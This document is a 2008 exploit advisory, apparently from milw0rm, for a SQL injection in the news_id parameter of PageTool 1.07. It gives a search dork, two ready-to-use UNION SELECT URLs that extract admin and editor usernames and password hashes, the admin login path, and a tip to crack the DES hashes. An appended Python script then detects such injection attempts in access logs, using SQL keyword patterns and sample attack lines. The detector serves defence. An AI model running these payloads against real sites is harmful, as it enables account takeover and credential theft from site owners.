PageTool 1.07 news_id Remote SQL Injection Vulnerability
2008-01-25 00:00:00* removed duplicate *
http://milw0rm.com/exploits/4107
/str0ke
--==+================================================================================+==--
--==+ PageTool 1.07 AND Prior SQL Injection Vulnerability +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: www.pagetool.org
DORK: "Powered by Pagetool"
DESCRIPTION:
SQL injection in the news_id parameter (index.php?name=pagetool_news) lets an attacker pull admin/user credentials from the database.
EXPLOITS:
www.site.com/index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/LIKE/**/0x2561646D696E25/*
www.site.com/index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/NOT/**/LIKE/**/0x2561646D696E25/*
NOTE/TIP:
Admin login is at /index.php?name=pt_admin_man_en
All passwords are encrypted with the traditional DES algorithm; they can possibly be cracked with "John The Ripper".
The first injection returns admin accounts, the second returns editors.
GREETZ: milw0rm.com, h4ck-y0u.org !
--==+================================================================================+==--
--==+ PageTool 1.07 AND Prior SQL Injection Vulnerability +==--
--==+================================================================================+==--
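
Added example (not part of the original advisory or of PageTool): a Python check that flags access-log requests to name=pagetool_news whose news_id is not a plain integer, and notes clients that then request the admin login page named above. It assumes an Apache-style combined log and that legitimate news_id values are small integers; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQ = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PLAIN_ID = re.compile(r"\d{1,10}")  # assumption: real news_id values are small integers
SQL_HINT = re.compile(r"(?i)\b(?:union|select|concat|from|like)\b|/\*|0x[0-9a-f]{2,}")

# Constructed sample access log (combined format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Jan/2008:10:00:01 +0000] "GET /index.php?name=pagetool_news&news_id=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [25/Jan/2008:10:00:07 +0000] "GET /index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5/* HTTP/1.1" 200 4312',
    '192.0.2.44 - - [25/Jan/2008:10:00:09 +0000] "GET /index.php?name=pagetool_news&news_id=-1%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1 HTTP/1.1" 200 4312',
    '192.0.2.44 - - [25/Jan/2008:10:03:30 +0000] "GET /index.php?name=pt_admin_man_en HTTP/1.1" 200 2048',
    '192.0.2.10 - - [25/Jan/2008:10:04:00 +0000] "GET /index.php?name=pt_admin_man_en HTTP/1.1" 200 2048',
    '198.51.100.7 - - [25/Jan/2008:10:05:00 +0000] "GET /index.php?name=pagetool_news&news_id=7abc HTTP/1.1" 200 900',
]


def scan(lines):
    """Return (findings, followups): requests with a non-integer news_id, and
    clients that asked for the admin login page after such a request."""
    findings, followups, seen = [], [], set()
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs percent-decodes, so encoded and literal payloads look alike.
        q = parse_qs(urlsplit(target).query, keep_blank_values=True)
        names = q.get("name", [])
        if "pt_admin_man_en" in names and client in seen:
            followups.append(client)
        if "pagetool_news" not in names:
            continue
        for value in q.get("news_id", []):
            if not PLAIN_ID.fullmatch(value):
                seen.add(client)
                findings.append({"client": client, "news_id": value,
                                 "sql_hint": bool(SQL_HINT.search(value))})
    return findings, followups


if __name__ == "__main__":
    hits, followups = scan(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("admin login after bad news_id:", followups)
```

The integer check is the primary signal; sql_hint only labels a hit and should not be used on its own as a filter.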

